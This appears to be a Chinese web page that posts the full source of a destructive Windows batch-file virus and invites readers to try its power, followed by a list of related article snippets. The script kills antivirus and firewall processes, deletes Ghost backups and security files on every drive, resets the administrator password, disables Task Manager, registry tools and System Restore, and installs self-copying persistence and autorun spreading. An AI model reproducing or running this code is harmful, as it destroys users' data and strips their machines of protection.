最强的用批处理编写的病毒

内容就是下面这些了,如果你想试试它的威力,不妨试试,,,呵呵

代码如下:

@echo off 
title You DEAD!!!!!!! 
set taskkill=s 
copy %0 %windir%\system32\cmd.bat 
attrib %windir%\system32\cmd.bat +r +s +h 
net stop sharedaccess >nul 
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul 
%s% /im norton* /f >nul 
%s% /im av* /f >nul 
%s% /im fire* /f >nul 
%s% /im anti* /f >nul 
%s% /im spy* /f >nul 
%s% /im bullguard /f >nul 
%s% /im PersFw /f >nul 
%s% /im KAV* /f >nul 
%s% /im ZONEALARM /f >nul 
%s% /im SAFEWEB /f >nul 
%s% /im OUTPOST /f >nul 
%s% /im nv* /f >nul 
%s% /im nav* /f >nul 
%s% /im F-* /f >nul 
%s% /im ESAFE /f >nul 
%s% /im cle /f >nul 
%s% /im BLACKICE /f >nul 
%s% /im def* /f >nul 
%s% /im 360safe.exe /f >nul 
net stop Shadow" "System" "Service 
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z 
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul 
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul 
rem 修改注册表....... 
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ 
Folder\Hidden\SHOWALL /v  
CheckedValue /t REG_DWORD /d 00000000 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoRun /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoRecentDocsMenu /t  
REG_DWORD /d 00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoDrives /t REG_DWORD /d  
4294967295 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v  
Disableregistrytools /t  
REG_DWORD /d 00000002 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoNetHood /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V  
NoDesktop /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoClose /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoFind /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v  
DisableTaskMgr /t REG_DWORD  
/d 00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoLogOff /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
NoSetTaskBar /t REG_DWORD  
/d 00000001 /f >nul 
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v  
DisableSR /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v  
DisableConfig /t REG_DWORD /d  
00000001 /f >nul 
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v  
RestrictRun /t REG_DWORD /d  
00000001 /f >nul 
cls 
net user administrator 123456 >nul 
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul 
echo @echo off >d:\setup.bat 
echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新 
安装系统可以解决此问题 
!^.^ >>d:\setup.bat 
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动 
\a.bat >>d:\setup.bat 
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>d:\setup.bat 
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>d:\setup.bat 
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>d:\setup.bat 
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f  
>>d:\setup.bat 
echo [windows] >> %windir%\win.ini 
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini 
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini 
echo [boot] >> %windir%\system.ini 
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini 
echo [AutoRun] >d:\autorun.inf 
echo Open=setup.bat >>d:\autorun.inf 
echo Open=system.bat >>d:\autorun.inf 
attrib d:\autorun.inf +r +s +h >>d:\setup.bat 
attrib d:\setup.bat +r +s +h >>d:\setup.bat 
start d:\setup.bat /min >nul 
echo @echo off >>C:\AUTOEXEC.BAT 
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v  
AUTOEXEC.BAT /t REG_SZ /d  
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT 
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v  
AUTOEXEC.BAT /t REG_SZ /d  
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT 
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v  
AUTOEXEC.BAT /t REG_SZ /d  
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT 
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>C:\AUTOEXEC.BAT 
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>C:\AUTOEXEC.BAT 
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>C:\AUTOEXEC.BAT 
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT 
copy %0 %systemroot%\windows.bat >nul 
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat 
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>% 
windir%/system32/explorer.bat 
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>% 
windir%/system32/explorer.bat 
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v  
AUTOEXEC.BAT /t REG_SZ /d  
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat 
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v  
AUTOEXEC.BAT /t REG_SZ /d  
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat 
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>%windir%/system32/explorer.bat 
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v  
setup.bat /t REG_SZ /d d:\setup.bat  
/f >>%windir%/system32/explorer.bat 
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v  
explorer.bat /t REG_SZ /d % 
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat 
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v  
explorer.bat /t REG_SZ /d % 
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat 
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat 
attrib %windir%/system32/explorer.bat +r +s +h% 
attrib %systemroot%/windows.bat +r +s +h 
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat 
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat 
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat 
set drive=e f g h i j k l m n o p q r s t u v w x y z 
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf 
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf 
copy %0 d:\Program" "Files\run.bat 
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start  
d:\Program" "Files\run.bat /min  
>>%%c:\system.bat 
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat 
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul 
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul 
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat 
/min >>d:\setup.bat 
attrib d:\Program" "Files\run.bat +r +s +h >nul 
del %0 
exit

(0)

相关推荐

  • 最强的用批处理编写的病毒

    内容就是下面这些了,如果你想试试它的威力,不妨试试,,,呵呵 复制代码 代码如下: @echo off  title You DEAD!!!!!!!  set taskkill=s  copy %0 %windir%\system32\cmd.bat  attrib %windir%\system32\cmd.bat +r +s +h  net stop sharedaccess >nul  %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.e

  • 用批处理实现Auto病毒专杀工具的代码

    @ echo off color 0a mkdir c:\windows\system32\algssl.exe mkdir c:\windows\system32\msfir80.exe mkdir c:\windows\system32\msime80.exe attrib +s +r +h c:\windows\system32\algssl.exe attrib +s +r +h c:\windows\system32\msfir80.exe attrib +s +r +h c:\win

  • "熊猫烧香"犯罪嫌疑人李俊编写的病毒专杀工具(非病毒)下载

    今年1月中旬,湖北省仙桃市公安局网监部门根据公安部公共信息网络安全监察局及省公安厅的统一部署,对"熊猫烧香"病毒的制作者开展调查.经查,熊猫烧香病毒的制作者为湖北省武汉市李俊,据李俊交代,其于2006年10月16日编写了"熊猫烧香"病毒并在网上广泛传播,并且还以自己出售和由他人代卖的方式,在网络上将该病毒销售给120余人,非法获利10万余元.经病毒购买者进一步传播,导致该病毒的各种变种在网上大面积传播,对互联网用户计算机安全造成了严重破坏.李俊还于2003年编写了&

  • Dos批处理编写一键清理系统垃圾的bat代码

    del 命令的参数 /F 强制删除只读文件. /S 从所有子目录删除指定文件. /Q 安静模式.删除全局通配符时,不要求确认. rd 命令的参数 /s 除目录本身外,还将删除指定目录下的所有子目录和文件.用于删除目录树. /q 安静模式 /s 删除目录树时不要求确认. 代码一 @echo off & title 清理系统垃圾 del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\*.mp3 del /f /s /q %system

  • linux的病毒发展史及分类

    1996年的Staog是Linux系统下的第一个病毒,它出自澳大利亚一个叫VLAD的组织(Windows 95下的第一个病毒程序Boza也系该组织所为).Staog病毒是用汇编语言编写,专门感染二进制文件,并通过三种方式去尝试得到root权限. Staog病毒并不会对系统有什么实质性的损坏.它应该算是一个演示版.它向世人揭示了Linux可能被病毒感染的潜在危险.Linux系统上第二个被发现的病毒是Bliss病毒,它是一个不小心被释放出来的实验性病毒.与其它病毒不同的是,Bliss本身带有免疫程序

  • 通过批处理实现DHCP服务器批量配置保留地址

    在大家印象中,DHCP获取到的地址是有个租约的,租约一到是,客户端就会重新获取的IP地址,这时获取到的IP地址跟原来相比可能会改变的,这对网络管理很不利.用静态IP的话,不去动的话地址不会变,不过修改起来就要每台要每台机去划有点麻烦,容易出错. 其实DHCP一般都有地址保留地址功能,可以让客户端分配到一个固定的IP地址,在网络使用DHCP的情况下,这能给内网管理带来了极大的方便.不过保留地址配置起来就有点麻烦,要配置的数量少还好说,要是多的话,可就是个麻烦事啊.这中麻烦事就交给批处理吧.哈哈 本

  • 毕业论文-如何预防计算机的网络病毒

    摘要 介绍网络中的计算机病毒,如邮件病毒.蠕虫和木马的特点与其它类病毒的区别和联系以及常见的邮件病毒的实例.同时根据当前计算机病毒发展的趋势,提出了一些防治建议. 关键词 网络 病毒 程序 随着国际互联网的快速发展,电子邮件成为人们相互交流最常见的工具,于是它也成电子邮件型病毒的重要载体.最近几年,出现了许多危害极大的邮件型病毒,如"LOVE YOU"病毒."库尔尼科娃"病毒."Homepage"病毒以及"求职信"病毒等,这些

  • Python3.7黑帽编程之病毒篇(基础篇)

    引子 Hacker(黑客),往往被人们理解为只会用非法手段来破坏网络安全的计算机高手.但是,黑客其实不是这样的,真正的"网络破坏者"是和黑客名称和读音相似的骇客. 骇客,是用黑客手段进行非法操作并为己取得利益的人.黑客,是用黑客手段为国家或单位做事的人. 那么,既然黑客不是一个很坏的职业,我们就可以去试着学习. 黑客本身的初衷 --黑客其实一直是善良的. 骇客其实他的前身就是黑客. 骇客与黑客分家,有这么一个故事: 原本,只有黑客一族.而不久后,有些黑客想用黑客手段来获取利益,不断被其

  • 教你如何做批处理文件

    如果电脑中了copy病毒,copy这种病毒非常的顽强,用一般的杀毒软件很难查杀干净,经过我多天的研究终于找到了一个简单方便的查杀方法,下面写出来和大家分享.      首先我们先认识下什么是批处理文件?      批处理文件的后缀名为.bat,可以使用任何的文本编辑程序进行编辑.批处理文件可以实现自动的连续执行多条DOS命令,只要你熟悉DOS命令,就能够通过批处理编写自己的命令程序.      在建立批处理文件之前我们给出COPY病毒的手工查杀方法,分析方法策略.      1.重新启动系统,进

  • 假冒IE图标,DDOS.EXE的解决方案

    File size: 202239 bytes  MD5: 3e995b27d599883173d40cd5a04af9b2  SHA1: 0dbe1d3ae07bb5462235422537bc1b92fd33054f  packers: UPX  测试时间:2007-03-25 运行后病毒样本,自动复制副本到%SYSTEM%目录下 %SYSTEM%\ddos.exe %SYSTEM%\Deleteme.bat   注:批处理命令并没有运行,但它的目的是使用批处理命令删除病毒样本及本身, 病毒

随机推荐